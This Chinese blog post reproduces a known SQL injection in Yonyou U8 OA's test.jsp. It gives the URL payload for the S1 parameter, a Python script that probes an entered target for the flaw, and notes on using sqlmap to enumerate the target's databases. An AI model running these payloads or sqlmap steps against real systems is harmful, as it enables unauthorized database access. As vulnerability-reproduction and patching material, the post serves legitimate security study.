用友OA U8 test.jsp sql注入漏洞复现

已于 2023-06-21 17:49:55 修改
阅读量1.6k 收藏 5
点赞数
文章标签: sql 渗透测试 web安全 网络安全
于 2023-06-21 17:42:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44828901/article/details/131327995
版权
警告:本文所涉及内容只可用于交流学习,请勿使用本文提到的内容违反法律,本文和作者不提供任何担保!!!

一、漏洞详情

用友U8 OA test.jsp存在SQL注入,主要是其s1参数未做过滤,导致sql注入,漏洞影响范围为“用友U8OA”。

用友u8OA界面如下

 二、漏洞复现

1、初步验证和探测

payload如下

ip:port/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))

在url一栏测试一下,发现回显成功,判定存在sql注入

也可使用以下脚本探测

import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
    print('+------------------------------------------')
    print('+输入目标url')
    print('+------------------------------------------')

def POC_1(target_url):
    vuln_url = target_url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
        if "c4ca4238a0b923820dcc509a6f75849b" in response.text and response.status_code == 200:
            print("\033[32m[o] 目标 {}存在漏洞 \n[o] 响应地址: {} \033[0m".format(target_url, vuln_url))
        else:
            print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))
    except Exception as e:
        print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url))

if __name__ == '__main__':
    title()
    target_url = str(input("Please input Attack Url\n目标Url >>> "))
    POC_1(target_url)

 脚本探测结果(显示存在此漏洞)

 2、使用sqlmap进一步验证

 burp抓取数据包,使用sqlmap验证

跑的时间有点长,建议指定数据库 --dbms=数据库类型

本次目标站指定mysql数据库,如下图

 经过等待,发现存在sql注入

 列出所有数据库,证明到此结束,(可进一步获取数据)

三、修复建议

更新至最新安全版本

Kepler开普勒
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
用友GRP-U8 XXE漏洞_14
fushuang333的博客
01-10 556
用友GRP-U8 XXE漏洞,通过上传xml文件,导致可加载恶意外部文件和代码,造成任意文件读取,命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等
用友U8 oa协同工作系统 文件上传漏洞_57
fushuang333的博客
02-24 1054
用友U8 oa协同工作系统 文件上传漏洞,上传文件漏洞的影响可能会非常严重,上传可执行代码可能让攻击者获得服务器控制权。
高危CNVD|用友-U8-OA基础版存在文件上传漏洞getshell
最新发布
2401_83799022的博客
06-18 557
1、先使用之前存在的任意文件上传漏洞,上传一个jsp后缀文件到系统中,当然此处也可以直接使用系统中存在的jsp 文件直接覆盖写入,但存在破坏性。漏洞说明:用友U8-OA基础版因为代码问题,存在任意文件覆盖写入漏洞,可以覆盖写入系统中存在的文件,可getshell。产品版本证明:根据上方fofa检索到的结果,任意打开一个系统,在系统登陆界面底部有版本信息。用友U8-OA基础版存在任意文件覆盖写入漏洞。到了此处高危CNVD就到手了!上传文件,文件内容为:11111。
【高危】用友 U8 Cloud、GRP-U8、A++V8.31存在多个高危漏洞
murphysec的博客
06-07 1708
墨菲安全是一家为您提供专业的软件供应链安全管理的科技公司,核心团队来自百度、华为、乌云等企业,公司为客户提供完整的软件供应链安全管理平台,围绕SBOM提供软件全生命周期的安全管理,平台能力包括软件成分分析、源安全管理、容器镜像检测、漏洞情报预警及商业软件供应链准入评估等多个产品。用友 GRP-U8 存在3个高危漏洞,分别为forgetPassword_old.jsp SQL注入漏洞、XML实体注入漏洞、XXNode SQL注入漏洞用友@[GRP-U8, GRP-U8]
用友GRP-U8 存在任意文件上传漏洞
holyxp的博客
07-26 1837
用友GRP-U8是面向政府及行政事业单位的财政管理应用。
用友OA/NC/NCCloud漏洞集合
qq_53229503的博客
08-16 8196
用友OA/NC/NCCloud漏洞集合
玩转CodeQLpy之用友GRP-U8漏洞挖掘
C20220511的博客
03-09 1248
通过CodeQLpy可以辅助代码审计人员快速定位代码中的问题,目前支持对SprintBoot的jar包,SpringMVC的war包,直接下载的源码文件夹,maven项目源码等方式进行自动化代码审计,详细使用方式参考github。使用CodeQLpy可以直接从目标源码中找到上百个高危的漏洞,包括但不限于反序列化,任意文件上传,任意文件删除,SQL注入,SSRF,XSS等,如图2.2所示。利用CodeQLpy生成的数据库,结合CSV文件中保存的有结果的插件名称,可以在VS中漏洞查找过程。
用友OA漏洞手册
热门推荐
1stPeak's Blog
04-20 1万+
用友OA漏洞手册 前言:用友OA产品漏洞笔记,供自己使用,不定期更新
用友U8二次开发之登录 U8Login.dll debug 支持13.0 ,15.0
11-30
在IT行业中,用友U8是一款广泛应用于企业管理的ERP(Enterprise Resource Planning)系统,它为企业提供了全面的财务、供应链、生产制造等管理功能。而"用友U8二次开发"是指用户或开发者根据自身需求对标准的用友U8...
U8Login.dll
11-20
总的来说,"U8Login.dll"是用友U8系统中一个关键的登录组件,它为开发者提供了与系统交互的桥梁,使得第三方应用程序可以无缝集成到U8系统中,实自动化登录和业务流程的自动化。通过深入理解并恰当使用"U8Login....
用友erp,u8实验报告.pdf
04-05
用友erp,u8实验报告.pdf用友erp,u8实验报告.pdf用友erp,u8实验报告.pdf用友erp,u8实验报告.pdf用友erp,u8实验报告.pdf用友erp,u8实验报告.pdf
U8常用SQL.sql
09-26
用友U8常用sql 表描述 ,支持查询所有基础资料和单据模板表和字段。便于日常问题的排查。
用友U8 MRP运算存储过程.sql
11-12
用友U8 MRP运算存储过程
用友ERP U8数据字典
06-10
用友ERP U8数据字典
用友API资讯管理器二次开发用的U8Login.dll
01-10
用友API资讯管理器二次开发中的U8Login.dll详解》 在IT行业中,企业级应用的二次开发是一项常见的需求,特别是在财务软件领域。用友U8系统作为国内广泛使用的财务管理软件,其开放的API接口为开发者提供了丰富的...
用友OA漏洞学习——test.jsp SQL注入漏洞
记录并分享学习安全的知识点..
05-02 3515
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 目录 警告 一、概述 二、影响版本 三、漏洞 验证poc如下: 一、概述 用友 U8 OA test.jsp文件存在 SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞。 二、影响版本 用友 U8 OA产品,版本不详。 三、漏洞 验证poc如下: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%2...
Goby 漏洞发布|用友 U8 Cloud ActionHandlerServlet 远程代码执行漏洞
m0_46699477的博客
11-07 360
用友 U8 Cloud 是一种基于企业互联网理念设计的云 ERP 整体解决方案,集成了人力资源、财务会计、物流库存、客户关系和生产制造等功能,旨在推动企业实敏捷经营、轻量化管理和简化IT操作,并提供安全可信、合规可靠的服务。用友 U8 Cloud 存在反序列化代码执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
用友ERP U8+V11.1人事管理系统详解
"U8+V11.1版本的人事管理系统是用友ERP U8产品线中的一个重要组成部分,专注于企业人力资源的基础管理和核心操作。该系统涵盖了组织规划、人员管理、业务处理以及报表定制等多个方面,旨在帮助企业构建高效的人力...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值